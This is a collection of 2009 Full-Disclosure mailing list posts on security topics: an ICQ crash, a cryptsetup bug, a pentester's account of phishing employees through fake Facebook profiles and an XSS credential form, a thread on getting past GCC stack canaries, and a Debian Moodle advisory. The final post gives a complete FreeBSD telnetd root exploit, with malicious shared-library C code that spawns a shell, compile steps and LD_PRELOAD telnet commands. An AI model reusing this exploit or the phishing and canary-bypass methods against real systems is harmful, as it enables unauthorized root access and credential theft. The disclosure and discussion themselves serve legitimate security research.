[Full-disclosure] ICQ 6 protocol bug?
For some time now I've seen ICQ receive messages, from unknown people, occassionally make the client core dump'. The messages are often gibberish - more like the ASCII characters from someone trying to make it execute something it shouldn't. My interpretation of this is unknown parties are trying to exploit a bug in ICQ6 (it may work on Win2k or Win98...) but I might be wrong. I need to fire up wireshark to see what actually get sent. Has anyone else seen this? Or have details on what the hack is? Google found some hits for old bugs, older than ICQ6 Darren -- Darren Reed darr...@reed.wattle.id.au ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] cryptsetup can't destroy last key of a LUKS partition under Ubuntu/Debian
Hello everyone, I noticed last week that the Debian packaged version of cryptsetup has a little limitation, which could be a security issue for people who have to destroy their data forever. It is impossible to destroy a keyslot when you used it to unlock the master key. I reported the bug to debian (etch and lenny are affected as far as I tested): http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=513596 and to ubuntu (tested on hardy): https://bugs.launchpad.net/cryptsetup/+bug/324871 It's not a major security problem, but people who were planning to run 'cryptsetup luksDelKey /dev/sda1 0' on their installation when the police comes to wake them up should be adviced that it won't work out of the box. Cheers, Pierre Dinh-van signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook from a hackers perspective
Great history, excellent method. Thanks! -Mensaje original- De: listbou...@securityfocus.com [mailto:listbou...@securityfocus.com] En nombre de Adriel T. Desautels Enviado el: Jueves, 12 de Febrero de 2009 13:24 Para: pen-test list CC: Untitled Asunto: Facebook from a hackers perspective For those interested, here is our latest blog entry. For the past few years we've (Netragard) been using internet based Social Networking tools to hack into our customer's IT Infrastructures. This method of attack has been used by hackers since the conception of Social Networking Websites, but only recently has it caught the attention of the media. As a result of this new exposure we've decided to give people a rare glimpse into Facebook from a hackers perspective. Lets start off by talking about the internet and identity. The internet is a shapeless world where identities are not only dynamic but can't ever be verified with certainty. As a result, its easily possible to be one person one moment, then another person the next moment. This is particularly true when using internet based social networking sites like Facebook (and the rest). Humans have a natural tendency to trust each other. If one human being can provide another human with something sufficient then trust is earned. That something sufficient can be a face to face meeting but it doesn't always need to be. Roughly 90% of the people that we've targeted and successfully exploited during our social attacks trusted us because they thought we worked for the same company as them. The setup... Facebook allows its users to search for other users by keyword. Many facebook users include their place of employment in their profile. Some companies even have facebook groups that only employees or contractors are allowed to become members of. So step one is to perform reconnaissance against those facebook using employees. This can be done with facebook, or with reconnaissance tools like Maltego and pipl.com. Reconnaissance is the military term for the collection of intelligence about an enemy prior to attacking the enemy. With regards to hacking, reconnaissance can be performed against social targets (facebook, myspace, etc) and technology targets (servers, firewalls, routers, etc). Because our preferred method of attacking employees through facebook is via phishing we normally perform reconnaissance against both vectors. When setting up for the ideal attack two things are nice to have but only one is required. The first is the discovery of some sort of Cross- site Scripting vulnerability (or something else useful) in our customers website (or one of their servers). The vulnerability is the component that is not required, but is a nice to have (we can set up our own fake server if we need to). The second component is the required component, and that is the discovery of facebook profiles for employees that work for our customer (other social networking sites work just as well). In one of our recent engagements we performed detailed social and technical reconnaissance. The social reconnaissance enabled us to identify 1402 employees 906 of which used facebook. We didn't read all 906 profiles but we did read around 200 which gave us sufficient information to create a fake employee profile. The technical reconnaissance identified various vulnerabilities one of which was the Cross-site Scripting vulnerability that we usually hope to find. In this case the vulnerability existed in our customer's corporate website. Cross-site scripting (XSS) is a kind of computer security vulnerability that is most frequently discovered in websites that do not have sufficient input validation or data validation capabilities. XSS vulnerabilities allow an attacker to inject code into a website that is viewed by other users. This injection can be done sever side by saving the injected code on the server (in a forum, blog, etc) or it can be done client side by injecting the code into a specially crafted URL that can be delivered to a victim. During our recent engagement we used a client side attack as opposed to a server side attack . We chose the client side attack because it enabled us to select only the users that we are interested in attacking. Server side attacks are not as surgical and usually affect any user who views the compromised server page. The payload that we created was designed to render a legitimate looking https secured web page that appeared to be a component of our customer's web site. When a victim clicks on the specially crafted link the payload is executed and the fake web page is rendered. In this case our fake web page was an alert that warned users that their accounts may have been compromised and that they should verify their credentials by entering them into the form provided. When the users credentials are entered the form submitted
Re: [Full-disclosure] Facebook from a hackers perspective
- Original Message - From: Adriel T. Desautels Sent: Thursday, February 12, 2009 6:23 AM Subject: Facebook from a hackers perspective Lets start off by talking about the internet and identity. The internet is a shapeless world where identities are not only dynamic but can't ever be verified with certainty. As a result, its easily possible to be one person one moment, then another person the next moment. This is particularly true when using internet based social networking sites like Facebook (and the rest). http://www.unc.edu/depts/jomc/academics/dri/idog.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook from a hackers perspective
That is awesome! I am going to add that to the blog post :) On Feb 13, 2009, at 5:41 AM, Michael Painter wrote: - Original Message - From: Adriel T. Desautels Sent: Thursday, February 12, 2009 6:23 AM Subject: Facebook from a hackers perspective Lets start off by talking about the internet and identity. The internet is a shapeless world where identities are not only dynamic but can't ever be verified with certainty. As a result, its easily possible to be one person one moment, then another person the next moment. This is particularly true when using internet based social networking sites like Facebook (and the rest). http://www.unc.edu/depts/jomc/academics/dri/idog.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Adriel T. Desautels ad_li...@netragard.com -- Subscribe to our blog http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook from a hackers perspective
On Fri, Feb 13, 2009 at 10:12 AM, bobby.mug...@hushmail.com wrote: Your transgender technical attack was pioneered and perfected in 2008 by information security expert Eric Loki Hines - why are you taking credit for a lesser version of his groundbreaking work, and insisting on originality? Perhaps he's experienced in transgendered psychology maybe even a transgender himself. Not that there is anything wrong with that. Why are you coming down on him for plagiarizing? Everyone in the security industry with more posts to mailing lists than actual experience conducting real world security work (momand-pop.com's don't count!) is concretely an expert at talking the talk. So why get on his case for using sed? 's:that work:is mines now:g'. Don't be such a troll -- Making no mistakes is what establishes the certainty of victory, for it means conquering an enemy that is already defeated. - Sun Tzu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook from a hackers perspective
Sounds to me like you have a crush on Eric Loki Hines. On Feb 13, 2009, at 10:12 AM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear ATD, Because most of the targeted employees were male between the ages of 20 and 40 we decided that it would be best to become a very attractive 28 year old female. Your transgender technical attack was pioneered and perfected in 2008 by information security expert Eric Loki Hines - why are you taking credit for a lesser version of his groundbreaking work, and insisting on originality? 1. Eric Loki Hines is a security expert and presents at BlackHat http://www.blackhat.com/html/win-usa-01/win-usa-01- speakers.html#Loki 2. Eric Loki Hines updates his linkedin profile http://www.linkedin.com/in/alissaknight 3. Alissa Knight starts softcore pornography site http://www.alissaknight.com 4. Snosoft claims to have invented social engineering. Please give credit where credit is due. I await your response with masterfully baited breath. - -bm On Fri, 13 Feb 2009 09:45:42 -0500 Adriel T. Desautels ad_li...@netragard.com wrote: That is awesome! I am going to add that to the blog post :) On Feb 13, 2009, at 5:41 AM, Michael Painter wrote: - Original Message - From: Adriel T. Desautels Sent: Thursday, February 12, 2009 6:23 AM Subject: Facebook from a hackers perspective Lets start off by talking about the internet and identity. The internet is a shapeless world where identities are not only dynamic but can't ever be verified with certainty. As a result, its easily possible to be one person one moment, then another person the next moment. This is particularly true when using internet based social networking sites like Facebook (and the rest). http://www.unc.edu/depts/jomc/academics/dri/idog.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Adriel T. Desautels ad_li...@netragard.com -- Subscribe to our blog http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkmVjc4ACgkQhNp8gzZx3sjtogP7BH0DqiXnpd2uJd23WzCb5ywr6DdL rsRcTuR1UExC7LKNnBcEDbcxyO+w+uygxBV2EpoQvi81WQEnTqUOsBuDNCKctNy/L8X7 Lbj76e3u+lx0KcVYwZcl+lPUlVswjV3xuiqMQHcpy3XyMdyqcMsQa2oW0prUXgLjrl/J lW2CbzA= =agYk -END PGP SIGNATURE- -- Thinking of a life with religion? Click here to find a religious school near you. http://tagline.hushmail.com/fc/PnY6qxulxoTwAKHGR31YqHEvinrD0DrkWQo0LWV2XOLex2vtyVhFc/ Adriel T. Desautels ad_li...@netragard.com -- Subscribe to our blog http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook from a hackers perspective
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Attentive Dialtone, Are you suggesting there is something wrong with my feelings for her? - -bm On Fri, 13 Feb 2009 11:28:22 -0500 Adriel T. Desautels ad_li...@netragard.com wrote: Sounds to me like you have a crush on Eric Loki Hines. On Feb 13, 2009, at 10:12 AM, bobby.mug...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear ATD, Because most of the targeted employees were male between the ages of 20 and 40 we decided that it would be best to become a very attractive 28 year old female. Your transgender technical attack was pioneered and perfected in 2008 by information security expert Eric Loki Hines - why are you taking credit for a lesser version of his groundbreaking work, and insisting on originality? 1. Eric Loki Hines is a security expert and presents at BlackHat http://www.blackhat.com/html/win-usa-01/win-usa-01- speakers.html#Loki 2. Eric Loki Hines updates his linkedin profile http://www.linkedin.com/in/alissaknight 3. Alissa Knight starts softcore pornography site http://www.alissaknight.com 4. Snosoft claims to have invented social engineering. Please give credit where credit is due. I await your response with masterfully baited breath. - -bm On Fri, 13 Feb 2009 09:45:42 -0500 Adriel T. Desautels ad_li...@netragard.com wrote: That is awesome! I am going to add that to the blog post :) On Feb 13, 2009, at 5:41 AM, Michael Painter wrote: - Original Message - From: Adriel T. Desautels Sent: Thursday, February 12, 2009 6:23 AM Subject: Facebook from a hackers perspective Lets start off by talking about the internet and identity. The internet is a shapeless world where identities are not only dynamic but can't ever be verified with certainty. As a result, its easily possible to be one person one moment, then another person the next moment. This is particularly true when using internet based social networking sites like Facebook (and the rest). http://www.unc.edu/depts/jomc/academics/dri/idog.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Adriel T. Desautels ad_li...@netragard.com -- Subscribe to our blog http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkmVjc4ACgkQhNp8gzZx3sjtogP7BH0DqiXnpd2uJd23WzCb5ywr6Dd L rsRcTuR1UExC7LKNnBcEDbcxyO+w+uygxBV2EpoQvi81WQEnTqUOsBuDNCKctNy/L8X 7 Lbj76e3u+lx0KcVYwZcl+lPUlVswjV3xuiqMQHcpy3XyMdyqcMsQa2oW0prUXgLjrl/ J lW2CbzA= =agYk -END PGP SIGNATURE- -- Thinking of a life with religion? Click here to find a religious school near you. http://tagline.hushmail.com/fc/PnY6qxulxoTwAKHGR31YqHEvinrD0DrkWQo0 LWV2XOLex2vtyVhFc/ Adriel T. Desautels ad_li...@netragard.com -- Subscribe to our blog http://snosoft.blogspot.com -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkmVoUYACgkQhNp8gzZx3sh9pwP+On15bpAdMXbxMlt//VVFNkt54BT+ QhEoIU1CX2VVZ7AQ9rbdbabAr7zjfq9FFncYflwnlE4c9rU0i6AbIG3ayoBILNmePreN MX+Qr/lv8CJwGQ5+NuTxeZ88ECKxtaOLc56S/HKDceRNSolfuEhEPCOpBJNWl+djAwFp SHxoFa0= =TPVo -END PGP SIGNATURE- -- Start your own international business. Click now! http://tagline.hushmail.com/fc/PnY6qxvJn1zAokeGVNMUqaCkouwf6Aoz3JqEf1r1rUUQTZuHPP6ic/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Exploiting buffer overflows via protected GCC
I came across a problem that I am sure many security researchers have seen
before:
ja...@uboo:~$ cat bof.c
#include stdio.h
#include string.h
int main()
{
char buf[512];
memset(buf, 'A', 528);
return 0;
}
ja...@uboo:~$
ja...@uboo:~$ ./bof
*** stack smashing detected ***: ./bof terminated
=== Backtrace: =
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f08548]
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x0)[0xb7f08500]
./bof[0x8048467]
[0x41414141]
=== Memory map:
08048000-08049000 r-xp 08:01 5630493/home/jason/bof
08049000-0804a000 r--p 08:01 5630493/home/jason/bof
0804a000-0804b000 rw-p 1000 08:01 5630493/home/jason/bof
09407000-09428000 rw-p 09407000 00:00 0 [heap]
b7dfe000-b7e0b000 r-xp 08:01 2696597/lib/libgcc_s.so.1
b7e0b000-b7e0c000 r--p c000 08:01 2696597/lib/libgcc_s.so.1
b7e0c000-b7e0d000 rw-p d000 08:01 2696597/lib/libgcc_s.so.1
b7e0d000-b7e0e000 rw-p b7e0d000 00:00 0
b7e0e000-b7f66000 r-xp 08:01 2713045/lib/tls/i686/cmov/
libc-2.8.90.so
b7f66000-b7f68000 r--p 00158000 08:01 2713045/lib/tls/i686/cmov/
libc-2.8.90.so
b7f68000-b7f69000 rw-p 0015a000 08:01 2713045/lib/tls/i686/cmov/
libc-2.8.90.so
b7f69000-b7f6c000 rw-p b7f69000 00:00 0
b7f83000-b7f85000 rw-p b7f83000 00:00 0
b7f85000-b7f9f000 r-xp 08:01 2696604/lib/ld-2.8.90.so
b7f9f000-b7fa r-xp b7f9f000 00:00 0 [vdso]
b7fa-b7fa1000 r--p 0001a000 08:01 2696604/lib/ld-2.8.90.so
b7fa1000-b7fa2000 rw-p 0001b000 08:01 2696604/lib/ld-2.8.90.so
bfb8c000-bfba1000 rw-p bffeb000 00:00 0 [stack]
Aborted
ja...@uboo:~$
I have googled my brains out for a solution, but all I have gathered is that
my Ubuntu's gcc is compiled with SSP and everytime I try to overwrite the
return address it also overwrites the canary's value, and triggers a stop in
the program. I've disassembled it and anybody who can help me probably
doesn't need me to explain much more, but I would like to know a way to get
this. There seems to be some people on this list who may know something on
how to exploit on *nix systems with this protection enabled.
I do not want to just disable the protection and exploit it normally, I want
to learn how to exploit it this way.
Jason
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 1234567890 today
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 hi.. according to http://en.wikipedia.org/wiki/Unixtime unixtime will have today the 'magic' number 1234567890 gratulations --- and who know where the party is? :) /soylent btw: sry 4 non-sec-posting... i know the list has enough to carry with that --- but... i know there are many geeks out there who wanna make a screenshot of that ;) -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFJla0IY86qEhC92cgRAtnnAKCqqexnryOG6fOE2BSyXTI+kPeBPQCfcGjY oNziULQOPJJL+TS07UjSXN0= =omrj -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 1234567890 today
that just means it's the end of the world... On Fri, Feb 13, 2009 at 12:25 PM, the.soylent the.soyl...@gmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 hi.. according to http://en.wikipedia.org/wiki/Unixtime unixtime will have today the 'magic' number 1234567890 gratulations --- and who know where the party is? :) /soylent btw: sry 4 non-sec-posting... i know the list has enough to carry with that --- but... i know there are many geeks out there who wanna make a screenshot of that ;) -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFJla0IY86qEhC92cgRAtnnAKCqqexnryOG6fOE2BSyXTI+kPeBPQCfcGjY oNziULQOPJJL+TS07UjSXN0= =omrj -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting buffer overflows via protected GCC
On Fri, 13 Feb 2009 11:50:11 EST, Jason Starks said: memset(buf, 'A', 528); Don't do that. This sort of whoops is exactly what the gcc SSP canary is designed to stop. I have googled my brains out for a solution, but all I have gathered is that my Ubuntu's gcc is compiled with SSP and everytime I try to overwrite the return address it also overwrites the canary's value, and triggers a stop in the program. I've disassembled it and anybody who can help me probably doesn't need me to explain much more, but I would like to know a way to get this. There seems to be some people on this list who may know something on how to exploit on *nix systems with this protection enabled. What you want to do is be more precise in your splatting. Instead of one memset, see if you can come up with a way to do *two* memsets, which leave your stack looking like: 'A' (above the canary) 4 unmolested bytes of canary 'A' (below the canary) Of course, if you're trying to exploit already-existing code, you probably only have one memset/strcpy you can abuse, and the starting address of the destination is already nailed down, which means you need to fill in the 4 bytes of canary correctly. This means you need to find a way to obtain the value so you can use it. One hint - sometimes you're better off targeting the stack frame 2 or 3 function calls back, rather than the *current* frame. pgpUTlRvizmh1.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting buffer overflows via protected GCC
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 valdis.kletni...@vt.edu wrote: On Fri, 13 Feb 2009 11:50:11 EST, Jason Starks said: memset(buf, 'A', 528); Don't do that. This sort of whoops is exactly what the gcc SSP canary is designed to stop. I have googled my brains out for a solution, but all I have gathered is that my Ubuntu's gcc is compiled with SSP and everytime I try to overwrite the return address it also overwrites the canary's value, and triggers a stop in the program. I've disassembled it and anybody who can help me probably doesn't need me to explain much more, but I would like to know a way to get this. There seems to be some people on this list who may know something on how to exploit on *nix systems with this protection enabled. What you want to do is be more precise in your splatting. Instead of one memset, see if you can come up with a way to do *two* memsets, which leave your stack looking like: 'A' (above the canary) 4 unmolested bytes of canary 'A' (below the canary) Of course, if you're trying to exploit already-existing code, you probably only have one memset/strcpy you can abuse, and the starting address of the destination is already nailed down, which means you need to fill in the 4 bytes of canary correctly. This means you need to find a way to obtain the value so you can use it. One hint - sometimes you're better off targeting the stack frame 2 or 3 function calls back, rather than the *current* frame. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ He was actually seeking for ways to bypass stack protection in gcc environments. There may be references at the web, reducing the entropy for prediction, brute-forcing or abusing signal handlers, could be a good starting point. I have little experience with gcc, ask Matt Miller. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFJlbfFH+KgkfcIQ8cRAtR8AKCFeamGDKgIzqjZJZLRc+WaNMdhlQCg1fc3 z3u4YNF0Hkkv+4EydOkX1oo= =Gz91 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1724-1] New moodle packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1724-1secur...@debian.org http://www.debian.org/security/ Steffen Joeris February 13th, 2009 http://www.debian.org/security/faq - -- Package: moodle Vulnerability : several vulnerabilities Problem type : remote Debian-specific: no CVE IDs: CVE-2009-0500 CVE-2009-0502 CVE-2008-5153 Debian Bug : 514284 Several vulnerabilities have been discovered in Moodle, an online course management system. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-0500 It was discovered that the information stored in the log tables was not properly sanitized, which could allow attackers to inject arbitrary web code. CVE-2009-0502 It was discovered that certain input via the Login as function was not properly sanitised leading to the injection of arbitrary web script. CVE-2008-5153 Dmitry E. Oboukhov discovered that the SpellCheker plugin creates temporary files insecurely, allowing a denial of service attack. Since the plugin was unused, it is removed in this update. For the stable distribution (etch) these problems have been fixed in version 1.6.3-2+etch2. For the testing (lenny) distribution these problems have been fixed in version 1.8.2.dfsg-3+lenny1. For the unstable (sid) distribution these problems have been fixed in version 1.8.2.dfsg-4. We recommend that you upgrade your moodle package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch2.dsc Size/MD5 checksum: 793 b86fd980d09fc1f54744962d765a17d7 http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch2.diff.gz Size/MD5 checksum:25398 60b9bf677040fbd71e7951deaa8b91d7 http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3.orig.tar.gz Size/MD5 checksum: 7465709 2f9f3fcf83ab0f18c409f3a48e07eae2 Architecture independent components: http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch2_all.deb Size/MD5 checksum: 6582298 7a90893e954672f33e129aa4d7ca5aa3 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJldoJW5ql+IAeqTIRAqgIAJ0dhSgFQxBDCq0PoSav/LyyCmtaYQCgj+Ln r8qoVwy7k6F60fJPA1DAKYE= =GzCu -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploiting buffer overflows via protected GCC
On Fri, Feb 13, 2009 at 11:50:11AM -0500, Jason Starks wrote:
I came across a problem that I am sure many security researchers have seen
before:
ja...@uboo:~$ cat bof.c
#include stdio.h
#include string.h
int main()
{
char buf[512];
memset(buf, 'A', 528);
return 0;
}
ja...@uboo:~$
ja...@uboo:~$ ./bof
*** stack smashing detected ***: ./bof terminated
=== Backtrace: =
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f08548]
ja...@uboo:~$
I have googled my brains out for a solution, but all I have gathered is that
my Ubuntu's gcc is compiled with SSP and everytime I try to overwrite the
return address it also overwrites the canary's value, and triggers a stop in
the program. I've disassembled it and anybody who can help me probably
doesn't need me to explain much more, but I would like to know a way to get
this. There seems to be some people on this list who may know something on
how to exploit on *nix systems with this protection enabled.
I do not want to just disable the protection and exploit it normally, I want
Perhaps you should learn first exactly _what_ caught your buffer overflow.
Hint: It was not SSP aka -fstack-protector.
Ciao, Marcus
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FreeBSD zeroday
FreeBSD (7.0-RELEASE) telnet daemon local privilege escalation -
And possible remote root code excution.
There is a rather big bug in the current FreeBSD telnetd daemon.
The environment is not properly sanitized when execution /bin/login,
what leads to a (possible) remote root hole.
The telnet protocol allows to pass environment variables inside the
telnet traffic and assign them to the other side of the tcp connection.
The telnet daemon of FreeBSD does not check for LD_* (like LD_PRELOAD)
environment variables prior to executing /bin/login.
So passing an environment variable with the identifier LD_PRELOAD and
the value of a precompiled library that is on the filesystem of the
victims box that includes malicious code is possible.
When /bin/login is executed with the user id and group id 0 ('root') it preloads
the library that was set by remote connection through a telnet environment
definition and executes it.
It is unlikely that this bug can be exploited remotely but is not impossible.
An attacker could f.e. upload a malicious library using ftp (including anonymous
ftp users), nfs, smb or any other (file) transfer protocol.
One scenario to exploit the bug remotely would be a ftp server running beside
the telnet daemon serving also anoynmous users with write access. Then the
attacker would upload the malicious library and defines the LD_PRELOAD
variable to something similar to /var/ftp/mallib.so to gain remote root access.
Here comes the actual exploit which can be executed with standard UNIX tools.
Paste this into a file using your favorite text editor:
---snip-
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009
#include unistd.h
#include stdio.h
#include sys/types.h
#include stdlib.h
void _init() {
FILE *f;
setenv(LD_PRELOAD, , 1);
system(echo ALEX-ALEX;/bin/sh);
}
---snip-
Then we compile this stuff.
---snip-
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o
-nostartfiles
---snip-
Then we copy the file to a known location (local root exploit)
---snip-
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-
...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.
---snip-
#telnet
auth disable SRA
environ define LD_PRELOAD /tmp/libno_ex.so.1.0
open target
---snip-
ALEX-ALEX
#ROOTSHELL
This will give us an immediate (probably remote) root shell.
This exploit is only verified on a FreeBSD 7.0-RELEASE fresh install
with telnetd enabled. Other version of FreeBSD may also be affected,
OpenBSD and NetBSD where not tested but MAY contain the same bug because
of historic reasons.
Signed,
Kingcope[nikolaos rangos]/2009
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
